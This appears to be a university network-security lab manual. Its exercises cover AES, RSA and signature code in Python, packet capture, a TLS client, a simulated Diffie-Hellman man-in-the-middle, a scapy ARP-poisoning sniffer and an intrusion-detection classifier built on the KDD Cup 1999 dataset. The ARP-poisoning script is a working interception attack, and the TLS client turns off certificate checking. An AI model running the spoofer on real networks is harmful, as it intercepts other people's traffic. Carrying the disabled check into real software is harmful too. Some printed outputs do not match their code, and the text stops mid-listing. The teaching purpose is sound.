PRACTICAL EXERCISES:
1. Implement symmetric key algorithms
2. Implement asymmetric key algorithms and key exchange algorithms
3. Implement digital signature schemes
4. Installation of Wireshark, tcpdump and observe data transferred in client-server
communication using UDP/TCP and identify the UDP/TCP datagram.
5. Check message integrity and confidentiality using SSL
6. Experiment Eavesdropping, Dictionary attacks, MITM attacks
7. Experiment with Sniff Traffic using ARP Poisoning
8. Demonstrate intrusion detection system using any tool.
9. Explore network monitoring tools
10. Study to configure Firewall, VPN
1. Implement symmetric key algorithms in python program
from base64 import b64encode, b64decode
import os

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


def encrypt(key, plaintext):
    """Encrypt *plaintext* (bytes) with AES-CFB under *key* (16/24/32 bytes).

    Returns a tuple ``(iv, ciphertext)`` of base64-encoded strings.
    """
    # Fresh random IV per message; the original used a fixed all-zero IV,
    # which leaks information about repeated plaintexts under the same key.
    iv = os.urandom(16)
    # PKCS7-pad the plaintext to the 128-bit AES block size.
    padder = padding.PKCS7(128).padder()
    plaintext = padder.update(plaintext) + padder.finalize()
    # AES in CFB mode.
    cipher = Cipher(algorithms.AES(key), modes.CFB(iv), backend=default_backend())
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext) + encryptor.finalize()
    # Base64 so both values are printable / transport-safe.
    return b64encode(iv).decode('utf-8'), b64encode(ciphertext).decode('utf-8')


def decrypt(key, iv, ciphertext):
    """Reverse of encrypt(): base64-decode, decrypt, unpad; returns a str."""
    iv = b64decode(iv)
    ciphertext = b64decode(ciphertext)
    cipher = Cipher(algorithms.AES(key), modes.CFB(iv), backend=default_backend())
    decryptor = cipher.decryptor()
    decrypted_text = decryptor.update(ciphertext) + decryptor.finalize()
    # Strip the PKCS7 padding added during encryption.
    unpadder = padding.PKCS7(128).unpadder()
    plaintext = unpadder.update(decrypted_text) + unpadder.finalize()
    return plaintext.decode('utf-8')


# Example usage:
if __name__ == "__main__":
    # Demo key only -- use a secure key-generation method (e.g. os.urandom)
    # for real applications.
    key = b'\x01' * 16
    # The text to be encrypted
    plaintext = "Hello, symmetric encryption!"
    iv, ciphertext = encrypt(key, plaintext.encode('utf-8'))
    print("IV:", iv)
    print("Ciphertext:", ciphertext)
    decrypted_text = decrypt(key, iv, ciphertext)
    print("Decrypted Text:", decrypted_text)
Output:
Ciphertext: /svDlhoB4PgoDvpUAmiEY0ro8YwVfT8LUBh24Ay/ZtQ=
Decrypted Text: Hello, symmetric encryption!
2. Implement digital signature scheme in Python
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding


def generate_key_pair():
    """Generate a 2048-bit RSA key pair; returns (private_pem, public_pem) bytes."""
    private_key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
    )
    # Extract the public key from the private key.
    public_key = private_key.public_key()
    # Serialize both keys to PEM so they can be stored or transmitted.
    private_pem = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption()
    )
    public_pem = public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo
    )
    return private_pem, public_pem


def sign(private_key_pem, message):
    """Sign *message* (bytes) with the PEM private key using RSA-PSS / SHA-256."""
    private_key = serialization.load_pem_private_key(
        private_key_pem, password=None, backend=default_backend())
    signature = private_key.sign(
        message,
        padding.PSS(
            mgf=padding.MGF1(hashes.SHA256()),
            salt_length=padding.PSS.MAX_LENGTH
        ),
        hashes.SHA256()
    )
    return signature


def verify(public_key_pem, message, signature):
    """Return True if *signature* is a valid RSA-PSS signature of *message*."""
    public_key = serialization.load_pem_public_key(
        public_key_pem, backend=default_backend())
    try:
        public_key.verify(
            signature,
            message,
            padding.PSS(
                mgf=padding.MGF1(hashes.SHA256()),
                salt_length=padding.PSS.MAX_LENGTH
            ),
            hashes.SHA256()
        )
        return True
    except Exception as e:
        # An invalid signature (or malformed key) raises; report and reject.
        print("Verification failed:", e)
        return False


# Example usage:
if __name__ == "__main__":
    private_key_pem, public_key_pem = generate_key_pair()
    # The text to be signed
    message = b"Hello, digital signature!"
    signature = sign(private_key_pem, message)
    print("Signature:", signature)
    verification_result = verify(public_key_pem, message, signature)
    if verification_result:
        print("Signature is valid.")
    else:
        print("Signature is not valid.")
Output:
Signature is valid
3. Implement asymmetric key algorithms in python program
>>> from cryptography.hazmat.backends import default_backend
>>> from cryptography.hazmat.primitives.asymmetric import rsa
>>> private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
>>> public_key = private_key.public_key()
# Storing the keys
>>> from cryptography.hazmat.primitives import serialization
>>> pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
>>> with open('private_key.pem', 'wb') as f:
f.write(pem)
>>>
>>> pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
>>> with open('public_key.pem', 'wb') as f:
f.write(pem)
# Reading the keys back in (for demonstration purposes)
>>> from cryptography.hazmat.backends import default_backend
>>> from cryptography.hazmat.primitives import serialization
>>> with open("private_key.pem", "rb") as key_file:
private_key = serialization.load_pem_private_key(
key_file.read(),
password=None,
backend=default_backend()
>>> with open("public_key.pem", "rb") as key_file:
public_key = serialization.load_pem_public_key(
key_file.read(),
backend=default_backend()
# Encrypting and decrypting
>>> from cryptography.hazmat.primitives import hashes
>>> from cryptography.hazmat.primitives.asymmetric import padding
>>>
>>> message = b'encrypt me!'
>>> encrypted = public_key.encrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
>>> original_message = private_key.decrypt(
encrypted,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
# Checking the results
>>> original_message
b'encrypt me!'
>>> message == original_message
True
Output:
True
4. Installation of Wireshark, tcpdump and observe data transferred in client-
server communication using UDP/TCP and identify the UDP/TCP datagram.
To install Wireshark and tcpdump, you can follow the steps below:
Installing tcpdump
1. For most Linux distributions, tcpdump is available as a standard package.
You can install it using the package manager of your distribution. For
example, on Red Hat and similar distributions, you can use the command:
sudo dnf install tcpdump
On Debian and similar distributions, you can use:
sudo apt install tcpdump
2. If tcpdump is not available as a standard package, you can download it from
the official website https://www.tcpdump.org/ and follow the installation
instructions provided.
Installing Wireshark
1. Wireshark is available for most Linux distributions as well. You can install it
using the package manager of your distribution. For example, on Ubuntu, you
can use the command:
sudo apt install wireshark
2. For other distributions, you can refer to their specific package management
commands to install Wireshark.
Capturing and Analyzing Traffic
Once you have installed tcpdump and Wireshark, you can capture packets using
tcpdump and then analyze the captured data in Wireshark. Here are the basic steps:
1. Capture packets using tcpdump. For example, to capture packets on a specific
interface and save them to a file, you can use the following command:
sudo tcpdump -i <interface> -w <file.pcap>
2. Transfer the captured file to your local machine where Wireshark is installed.
You can use SCP for this purpose.
3. Open the captured file in Wireshark to analyze the traffic. You can identify
UDP and TCP datagrams in the captured data using Wireshark's filtering and
analysis capabilities.
By following these steps, you can install tcpdump and Wireshark, capture network
traffic, and analyze the captured data to identify UDP and TCP datagrams.
5. Check message integrity and confidentiality using SSL
import ssl
import socket

# ssl.wrap_socket() was deprecated in Python 3.7 and removed in 3.12;
# build an SSLContext and wrap the socket through it instead.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# Demo against a local self-signed server, so certificate validation is
# disabled here.  NOTE(review): keep the default verification enabled in
# production, otherwise the connection is open to MITM attacks.
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

# create a TCP socket and wrap it with TLS
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = context.wrap_socket(s, server_hostname='localhost')

# connect to the server (the TLS handshake happens on connect)
ssl_sock.connect(('localhost', 443))

# send a message to the server; the TLS record layer provides both
# confidentiality (encryption) and integrity (MAC/AEAD) for the data
message = "Hello, server!"
ssl_sock.write(message.encode())

# receive a response from the server
response = ssl_sock.read()
print(response.decode())

# close the SSL connection
ssl_sock.close()
6. Experiment Eavesdropping, Dictionary attacks, MITM attacks
Man in the Middle (MITM) against Diffie-Hellman:
A malicious Malory, who holds a MitM (man-in-the-middle) position, can manipulate
the communications between Alice and Bob and break the security of the key
exchange.
Step by Step explanation of this process:
Step 1: Selected public numbers p and g, p is a prime number, called the “modulus”
and g is called the base.
Step 2: Selecting private numbers.
let Alice pick a private random number a and let Bob pick a private random number
b, Malory picks 2 random numbers c and d.
Step 3: Intercepting public values,
Malory intercepts Alice’s public value (g^a mod p), blocks it from reaching Bob, and
instead sends Bob her own public value (g^c mod p); Malory likewise intercepts Bob’s
public value (g^b mod p), blocks it from reaching Alice, and instead sends Alice her
own public value (g^d mod p).
Step 4: Computing secret key
Alice will compute a key S1 = g^(d·a) mod p, and Bob will compute a different key,
S2 = g^(c·b) mod p.
Step 5: If Alice uses S1 as a key to encrypt a later message to Bob, Malory can
decrypt it, re-encrypt it using S2, and send it to Bob. Bob and Alice won’t notice
any problem and may assume their communication is encrypted, but in reality,
Malory can decrypt, read, modify, and then re-encrypt all their conversations.
Below is the implementation:
Python3
import random
# Publicly agreed Diffie-Hellman parameters:
# p is a prime number (the "modulus")
# g is a primitive root of p (the "base")
p = int(input('Enter a prime number : '))
g = int(input('Enter a number : '))
class A:
    """An honest Diffie-Hellman party (Alice or Bob) with one private exponent."""

    def __init__(self):
        # Private random exponent; never sent on the wire.
        self.n = random.randint(1, p)

    def publish(self):
        """Return the public value g^n mod p."""
        # pow(base, exp, mod) performs modular exponentiation without
        # materializing the astronomically large intermediate g**n.
        return pow(g, self.n, p)

    def compute_secret(self, gb):
        """Combine the peer's public value into the shared secret gb^n mod p."""
        return pow(gb, self.n, p)
class B:
    """The MITM attacker (Malory): one private exponent per victim link."""

    def __init__(self):
        # Private exponent used on the link with Alice.
        self.a = random.randint(1, p)
        # Private exponent used on the link with Bob.
        self.b = random.randint(1, p)
        # Index 0 -> Alice's link, index 1 -> Bob's link.
        self.arr = [self.a, self.b]

    def publish(self, i):
        """Return the forged public value g^arr[i] mod p for victim *i*."""
        # 3-arg pow = efficient modular exponentiation (no huge intermediate).
        return pow(g, self.arr[i], p)

    def compute_secret(self, ga, i):
        """Shared secret with victim *i* from their public value *ga*."""
        return pow(ga, self.arr[i], p)
# Instantiate the two honest parties and the attacker.
alice = A()
bob = A()
eve = B()
# Private exponents chosen by each participant (never exchanged in a real run).
print(f'Alice selected (a) : {alice.n}')
print(f'Bob selected (b) : {bob.n}')
print(f'Eve selected private number for Alice (c) : {eve.a}')
print(f'Eve selected private number for Bob (d) : {eve.b}')
# Public values: Eve intercepts ga/gb and substitutes her own gea/geb.
ga = alice.publish()
gb = bob.publish()
gea = eve.publish(0)
geb = eve.publish(1)
print(f'Alice published (ga): {ga}')
print(f'Bob published (gb): {gb}')
print(f'Eve published value for Alice (gc): {gea}')
print(f'Eve published value for Bob (gd): {geb}')
# Each victim unknowingly shares a key with Eve instead of each other:
# S1 pairs Alice with Eve, S2 pairs Bob with Eve.
sa = alice.compute_secret(gea)
sea = eve.compute_secret(ga,0)
sb = bob.compute_secret(geb)
seb = eve.compute_secret(gb,1)
print(f'Alice computed (S1) : {sa}')
print(f'Eve computed key for Alice (S1) : {sea}')
print(f'Bob computed (S2) : {sb}')
print(f'Eve computed key for Bob (S2) : {seb}')
Output:
Enter a prime number (p) : 227
Enter a number (g) : 14
Alice selected (a) : 227
Bob selected (b) : 170
Eve selected private number for Alice (c) : 65
Eve selected private number for Bob (d) : 175
Alice published (ga): 14
Bob published (gb): 101
Eve published value for Alice (gc): 41
Eve published value for Bob (gd): 32
Alice computed (S1) : 41
Eve computed key for Alice (S1) : 41
Bob computed (S2) : 167
Eve computed key for Bob (S2) : 167
7. Experiment with Sniff Traffic using ARP Poisoning
python
from scapy.all import *

# Victim host we want to impersonate the gateway towards.
target_ip = "192.168.1.100"
target_mac = "00:11:22:33:44:55"
# Gateway we want to impersonate the victim towards.
gateway_ip = "192.168.1.1"
gateway_mac = "11:22:33:44:55:66"

# Forged ARP replies (op=2 is "is-at"): tell the target the gateway's IP
# lives at our MAC, and tell the gateway the target's IP lives at our MAC.
poison_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
poison_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)

# Inject both poisoned replies onto the wire.
send(poison_target)
send(poison_gateway)

def sniff_packets(packet):
    # Print source -> destination for every IP packet now flowing through us.
    if packet.haslayer(IP):
        print(packet[IP].src, "->", packet[IP].dst)

# Sniff indefinitely, handing each captured packet to the callback.
sniff(prn=sniff_packets)
8. Demonstrate intrusion detection system using any tool.
An Intrusion Detection System is a software application that detects network intrusions
using various machine learning algorithms. An IDS monitors a network or system for
malicious activity and protects a computer network from unauthorized access by
users, perhaps including insiders. The intrusion-detector learning task is to build a
predictive model (i.e. a classifier) capable of distinguishing between ‘bad
connections’ (intrusions/attacks) and ‘good’ (normal) connections.
Attacks fall into four main categories:
#DOS: denial-of-service, e.g. syn flood;
#R2L: unauthorized access from a remote machine, e.g. guessing password;
#U2R: unauthorized access to local superuser (root) privileges, e.g., various
“buffer overflow” attacks;
#probing: surveillance and another probing, e.g., port scanning.
Dataset Used : KDD Cup 1999 dataset
Dataset Description: Data files:
kddcup.names : A list of features.
kddcup.data.gz : The full data set
kddcup.data_10_percent.gz : A 10% subset.
kddcup.newtestdata_10_percent_unlabeled.gz
kddcup.testdata.unlabeled.gz
kddcup.testdata.unlabeled_10_percent.gz
corrected.gz : Test data with corrected labels.
training_attack_types : A list of intrusion types.
typo-correction.txt : A brief note on a typo in the data set that has been
corrected
Features:
feature name description type
duration length (number of seconds) of the connection continuous
protocol_type type of the protocol, e.g. tcp, udp, etc. discrete
service network service on the destination, e.g., http, telnet, etc. discrete
src_bytes number of data bytes from source to destination continuous
dst_bytes number of data bytes from destination to source continuous
flag normal or error status of the connection discrete
land 1 if connection is from/to the same host/port; 0 otherwise discrete
wrong_fragment number of “wrong” fragments continuous
urgent number of urgent packets continuous
Table 1: Basic features of individual TCP connections.
feature name description type
hot number of “hot” indicators continuous
num_failed_logins number of failed login attempts continuous
logged_in 1 if successfully logged in; 0 otherwise discrete
num_compromised number of “compromised” conditions continuous
root_shell 1 if root shell is obtained; 0 otherwise discrete
su_attempted 1 if “su root” command attempted; 0 otherwise discrete
num_root number of “root” accesses continuous
num_file_creations number of file creation operations continuous
num_shells number of shell prompts continuous
num_access_files number of operations on access control files continuous
num_outbound_cmds number of outbound commands in an ftp session continuous
is_hot_login 1 if the login belongs to the “hot” list; 0 otherwise discrete
is_guest_login 1 if the login is a “guest”login; 0 otherwise discrete
Table 2: Content features within a connection suggested by domain knowledge.
feature name description type
count number of connections to the same host as the current connection in the past two seconds continuous
Note: The following features refer to these same-host connections.
serror_rate % of connections that have “SYN” errors continuous
rerror_rate % of connections that have “REJ” errors continuous
same_srv_rate % of connections to the same service continuous
diff_srv_rate % of connections to different services continuous
srv_count number of connections to the same service as the current connection in the past two seconds continuous
Note: The following features refer to these same-service connections.
srv_serror_rate % of connections that have “SYN” errors continuous
srv_rerror_rate % of connections that have “REJ” errors continuous
srv_diff_host_rate % of connections to different hosts continuous
Table 3: Traffic features computed using a two-second time window.
Various Algorithms Applied: Gaussian Naive Bayes, Decision Tree, Random
Forest, Support Vector Machine, Logistic Regression.
Approach Used: I have applied the various classification algorithms
mentioned above on the KDD dataset and compared their results to build a
predictive model.
Step 1 – Data Preprocessing:
Code: Importing libraries and reading features list from ‘kddcup.names’ file.
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import time

# Print the feature list shipped with the KDD Cup 1999 dataset.
# (Windows-style relative path; adjust for your platform.)
with open("..\\kddcup.names", 'r') as f:
    print(f.read())
Code: Appending columns to the dataset and adding a new column name
‘target’ to the dataset.
# Comma-separated names of the 41 KDD feature columns.  The order matters:
# it must match the column order in the raw data files.
cols = """duration,
protocol_type,
service,
flag,
src_bytes,
dst_bytes,
land,
wrong_fragment,
urgent,
hot,
num_failed_logins,
logged_in,
num_compromised,
root_shell,
su_attempted,
num_root,
num_file_creations,
num_shells,
num_access_files,
num_outbound_cmds,
is_host_login,
is_guest_login,
count,
srv_count,
serror_rate,
srv_serror_rate,
rerror_rate,
srv_rerror_rate,
same_srv_rate,
diff_srv_rate,
srv_diff_host_rate,
dst_host_count,
dst_host_srv_count,
dst_host_same_srv_rate,
dst_host_diff_srv_rate,
dst_host_same_src_port_rate,
dst_host_srv_diff_host_rate,
dst_host_serror_rate,
dst_host_srv_serror_rate,
dst_host_rerror_rate,
dst_host_srv_rerror_rate"""

# BUG FIX: the separators inside `cols` are a comma followed by a newline,
# so the original split(', ') (comma + space) never split the string; split
# on ',' alone and strip the surrounding whitespace instead.
columns = []
for c in cols.split(','):
    if c.strip():
        columns.append(c.strip())

# The 42nd column holds the connection label.
columns.append('target')
print(len(columns))
Output:
42
Code: Reading the ‘attack_types’ file.
# Show the mapping from specific attack names to their broad categories
# (dos / r2l / u2r / probe) shipped with the dataset.
with open("..\\training_attack_types", 'r') as f:
    print(f.read())
Output:
back dos
buffer_overflow u2r
ftp_write r2l
guess_passwd r2l
imap r2l
ipsweep probe
land dos
loadmodule u2r
multihop r2l
neptune dos
nmap probe
perl u2r
phf r2l
pod dos
portsweep probe
rootkit u2r
satan probe
smurf dos
spy r2l
teardrop dos
warezclient r2l
warezmaster r2l
Code: Creating a dictionary of attack_types
# Map each specific attack label to one of the five Attack Type classes
# (normal, dos, r2l, u2r, probe).
# BUG FIX: the original listing was missing the closing brace.
attacks_types = {
    'normal': 'normal',
    'back': 'dos',
    'buffer_overflow': 'u2r',
    'ftp_write': 'r2l',
    'guess_passwd': 'r2l',
    'imap': 'r2l',
    'ipsweep': 'probe',
    'land': 'dos',
    'loadmodule': 'u2r',
    'multihop': 'r2l',
    'neptune': 'dos',
    'nmap': 'probe',
    'perl': 'u2r',
    'phf': 'r2l',
    'pod': 'dos',
    'portsweep': 'probe',
    'rootkit': 'u2r',
    'satan': 'probe',
    'smurf': 'dos',
    'spy': 'r2l',
    'teardrop': 'dos',
    'warezclient': 'r2l',
    'warezmaster': 'r2l',
}
Code: Reading the dataset(‘kddcup.data_10_percent.gz’) and adding Attack Type
feature in the training dataset where attack type feature has 5 distinct values i.e. dos,
normal, probe, r2l, u2r.
# 10% subset of the KDD Cup 1999 training data.
path = "..\\kddcup.data_10_percent.gz"
df = pd.read_csv(path, names = columns)
# Adding Attack Type column
# r[:-1] drops the trailing '.' that terminates every label in the raw data
# (e.g. 'smurf.') before looking up its broad category.
df['Attack Type'] = df.target.apply(lambda r:attacks_types[r[:-1]])
df.head()
Code: Shape of dataframe and getting data type of each feature
df.shape
Output:
(494021, 43)
Code: Finding missing values of all features.
df.isnull().sum()
Output:
duration 0
protocol_type 0
service 0
flag 0
src_bytes 0
dst_bytes 0
land 0
wrong_fragment 0
urgent 0
hot 0
num_failed_logins 0
logged_in 0
num_compromised 0
root_shell 0
su_attempted 0
num_root 0
num_file_creations 0
num_shells 0
num_access_files 0
num_outbound_cmds 0
is_host_login 0
is_guest_login 0
count 0
srv_count 0
serror_rate 0
srv_serror_rate 0
rerror_rate 0
srv_rerror_rate 0
same_srv_rate 0
diff_srv_rate 0
srv_diff_host_rate 0
dst_host_count 0
dst_host_srv_count 0
dst_host_same_srv_rate 0
dst_host_diff_srv_rate 0
dst_host_same_src_port_rate 0
dst_host_srv_diff_host_rate 0
dst_host_serror_rate 0
dst_host_srv_serror_rate 0
dst_host_rerror_rate 0
dst_host_srv_rerror_rate 0
target 0
Attack Type 0
dtype: int64
No missing value found, so we can further proceed to our next step.
Code: Finding Categorical Features
# Finding categorical features
# Categorical = columns pandas does not treat as numeric, minus the two
# label columns.
# NOTE(review): _get_numeric_data() is a private pandas API -- prefer
# df.select_dtypes(include='number') in new code.
num_cols = df._get_numeric_data().columns
cate_cols = list(set(df.columns)-set(num_cols))
cate_cols.remove('target')
cate_cols.remove('Attack Type')
# Bare expression: displays the list in a notebook cell.
cate_cols
Output:
['service', 'flag', 'protocol_type']
Visualizing Categorical Features using bar graph
Protocol type: We notice that ICMP is the most present in the used data, then TCP
and almost 20000 packets of UDP type
logged_in (1 if successfully logged in; 0 otherwise): We notice that just 70000
packets are successfully logged in.
Target Feature Distribution:
Attack Type(The attack types grouped by attack, it’s what we will predict)
Code: Data Correlation – Find the highly correlated variables using heatmap
and ignore them for analysis.
# Drop columns that are entirely NaN.  BUG FIX: passing 'columns'
# positionally to dropna() was deprecated and is rejected by pandas 2.0;
# use the axis keyword.
df = df.dropna(axis='columns')
# Keep only columns with more than one unique value (constant columns
# carry no information for correlation analysis).
df = df[[col for col in df if df[col].nunique() > 1]]
# Pairwise correlation of the remaining features, shown as a heatmap.
corr = df.corr()
plt.figure(figsize =(15, 12))
sns.heatmap(corr)
plt.show()
Output:
Code:
# Drop the second member of each highly correlated feature pair -- a
# near-perfectly correlated column adds no information for analysis.

# Highly correlated with num_compromised (correlation = 0.9938277978738366).
df.drop('num_root', axis = 1, inplace = True)
# Highly correlated with serror_rate (correlation = 0.9983615072725952).
df.drop('srv_serror_rate', axis = 1, inplace = True)
# Highly correlated with rerror_rate (correlation = 0.9947309539817937).
df.drop('srv_rerror_rate', axis = 1, inplace = True)
# Highly correlated with srv_serror_rate (correlation = 0.9993041091850098).
df.drop('dst_host_srv_serror_rate', axis = 1, inplace = True)
# Highly correlated with rerror_rate (correlation = 0.9869947924956001).
df.drop('dst_host_serror_rate', axis = 1, inplace = True)
# Highly correlated with srv_rerror_rate (correlation = 0.9821663427308375).
df.drop('dst_host_rerror_rate', axis = 1, inplace = True)
# Highly correlated with rerror_rate (correlation = 0.9851995540751249).
df.drop('dst_host_srv_rerror_rate', axis = 1, inplace = True)
# Highly correlated with srv_rerror_rate (correlation = 0.9865705438845669).
df.drop('dst_host_same_srv_rate', axis = 1, inplace = True)
Output:
Code: Feature Mapping – Apply feature mapping on features such as :
‘protocol_type’ & ‘flag’.
# Encode protocol_type as integers (icmp=0, tcp=1, udp=2).
protocol_codes = {'icmp': 0, 'tcp': 1, 'udp': 2}
df['protocol_type'] = df['protocol_type'].map(protocol_codes)
Code:
# Encode the connection-status flag as integers.
flag_codes = {
    'SF': 0, 'S0': 1, 'REJ': 2, 'RSTR': 3, 'RSTO': 4, 'SH': 5,
    'S1': 6, 'S2': 7, 'RSTOS0': 8, 'S3': 9, 'OTH': 10,
}
df['flag'] = df['flag'].map(flag_codes)
Output:
Code: Remove irrelevant features such as ‘service’ before modelling
df.drop('service', axis = 1, inplace = True)
Step 2 – Modelling
Code: Importing libraries and splitting the dataset
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler

# Drop the fine-grained label; 'Attack Type' (5 classes) is the target.
df = df.drop(['target', ], axis = 1)
print(df.shape)

# Target variable and feature matrix.
y = df[['Attack Type']]
X = df.drop(['Attack Type', ], axis = 1)

# Scale every feature into [0, 1] so no feature dominates by magnitude.
sc = MinMaxScaler()
X = sc.fit_transform(X)

# Split into train (67%) and test (33%) with a fixed seed for
# reproducibility.  (The original listing's line wrap split `random_state
# = 42` across two lines, breaking the statement.)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.33, random_state = 42)
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
Output:
(494021, 31)
(330994, 30) (163027, 30)
(330994, 1) (163027, 1)
Apply various machine learning classification algorithms such as Support Vector
Machines, Random Forest, Naive Bayes, Decision Tree, Logistic Regression to
create different models.
Code: Python implementation of Gaussian Naive Bayes
# Gaussian Naive Bayes
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score
clfg = GaussianNB()
# Fit the model, timing the wall-clock training duration.
# .values.ravel() flattens the (n, 1) target frame to the 1-D array
# sklearn expects.
start_time = time.time()
clfg.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 1.1145250797271729
Code:
start_time = time.time()
# BUG FIX: the original predicted on X_train while reporting "testing
# time"; the test-set predictions must come from X_test.
y_test_pred = clfg.predict(X_test)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 1.543299674987793
Code:
# Accuracy on the train split vs the held-out test split.
print("Train score is:", clfg.score(X_train, y_train))
print("Test score is:", clfg.score(X_test, y_test))
Output:
Train score is: 0.8795114110829804
Test score is: 0.8790384414851528
Code: Python implementation of Decision Tree
# Decision Tree
from sklearn.tree import DecisionTreeClassifier
# Shallow (depth 4) entropy-based tree.
clfd = DecisionTreeClassifier(criterion ="entropy", max_depth = 4)
# Fit and time the training.
start_time = time.time()
clfd.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 2.4408750534057617
start_time = time.time()
# BUG FIX: predict on the test split, not X_train, when timing testing.
y_test_pred = clfd.predict(X_test)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 0.1487727165222168
# Accuracy on the train split vs the held-out test split.
print("Train score is:", clfd.score(X_train, y_train))
print("Test score is:", clfd.score(X_test, y_test))
Output:
Train score is: 0.9905829108684749
Test score is: 0.9905230421954646
Code: Python code implementation of Random Forest
from sklearn.ensemble import RandomForestClassifier
# Ensemble of 30 decision trees.
clfr = RandomForestClassifier(n_estimators = 30)
# Fit and time the training.
start_time = time.time()
clfr.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 17.084914684295654
start_time = time.time()
# BUG FIX: predict on the test split, not X_train, when timing testing.
y_test_pred = clfr.predict(X_test)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 0.1487727165222168
# Accuracy on the train split vs the held-out test split.
print("Train score is:", clfr.score(X_train, y_train))
print("Test score is:", clfr.score(X_test, y_test))
Output:
Train score is: 0.99997583037759
Test score is: 0.9996933023364228
Code: Python implementation of Support Vector Classifier
from sklearn.svm import SVC
# Support Vector Classifier; gamma='scale' derives the kernel coefficient
# from the number of features and the feature variance.
clfs = SVC(gamma = 'scale')
# Fit and time the training.
start_time = time.time()
clfs.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 218.26840996742249
Code:
start_time = time.time()
# BUG FIX: predict on the test split, not X_train, when timing testing.
y_test_pred = clfs.predict(X_test)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 126.5087513923645
Code:
# Accuracy on the train split vs the held-out test split.
print("Train score is:", clfs.score(X_train, y_train))
print("Test score is:", clfs.score(X_test, y_test))
Output:
Train score is: 0.9987552644458811
Test score is: 0.9987916112055059
Code: Python implementation of Logistic Regression
from sklearn.linear_model import LogisticRegression
# Large max_iter so the solver converges on this dataset.
clfl = LogisticRegression(max_iter = 1200000)
# Fit and time the training.
start_time = time.time()
clfl.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 92.94222283363342
Code:
start_time = time.time()
# BUG FIX: predict on the test split, not X_train, when timing testing.
y_test_pred = clfl.predict(X_test)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 0.09605908393859863
Code:
# Accuracy on the train split vs the held-out test split.
print("Train score is:", clfl.score(X_train, y_train))
print("Test score is:", clfl.score(X_test, y_test))
Output:
Train score is: 0.9935285835997028
Test score is: 0.9935286792985211
Code: Python implementation of Gradient Descent
from sklearn.ensemble import GradientBoostingClassifier
# Gradient boosting with a fixed seed for reproducibility.
# NOTE(review): this reuses the name `clfg`, clobbering the GaussianNB
# model fitted earlier -- confirm that is intended.
clfg = GradientBoostingClassifier(random_state = 0)
# Fit and time the training.
start_time = time.time()
clfg.fit(X_train, y_train.values.ravel())
end_time = time.time()
print("Training time: ", end_time-start_time)
Output:
Training time: 633.2290260791779
start_time = time.time()
# BUG FIX: predict on the test split, not X_train, when timing testing.
y_test_pred = clfg.predict(X_test)
end_time = time.time()
print("Testing time: ", end_time-start_time)
Output:
Testing time: 2.9503915309906006
# Accuracy on the train split vs the held-out test split.
print("Train score is:", clfg.score(X_train, y_train))
print("Test score is:", clfg.score(X_test, y_test))
Output:
Train score is: 0.9979304760811374
Test score is: 0.9977181693829856
Code: Analyse the training and testing accuracy of each model.
# Bar chart: training accuracy (%) per classifier.
model_labels = ['NB', 'DT', 'RF', 'SVM', 'LR', 'GB']
train_accuracy = [87.951, 99.058, 99.997, 99.875, 99.352, 99.793]
fig = plt.figure(figsize=(15, 3), num=10)
plt.subplot(131)
plt.bar(model_labels, train_accuracy)
Output:
Code:
# Bar chart: test accuracy (%) per classifier.
model_labels = ['NB', 'DT', 'RF', 'SVM', 'LR', 'GB']
test_accuracy = [87.903, 99.052, 99.969, 99.879, 99.352, 99.771]
fig = plt.figure(figsize=(15, 3), num=10)
plt.subplot(131)
plt.bar(model_labels, test_accuracy)
Output:
Code: Analyse the training and testing time of each model.
# Bar chart: training time (seconds) per classifier.
model_labels = ['NB', 'DT', 'RF', 'SVM', 'LR', 'GB']
train_times = [1.11452, 2.44087, 17.08491, 218.26840, 92.94222, 633.229]
fig = plt.figure(figsize=(15, 3), num=10)
plt.subplot(131)
plt.bar(model_labels, train_times)
Output:
Code:
# Bar chart: testing time (seconds) per classifier.
model_labels = ['NB', 'DT', 'RF', 'SVM', 'LR', 'GB']
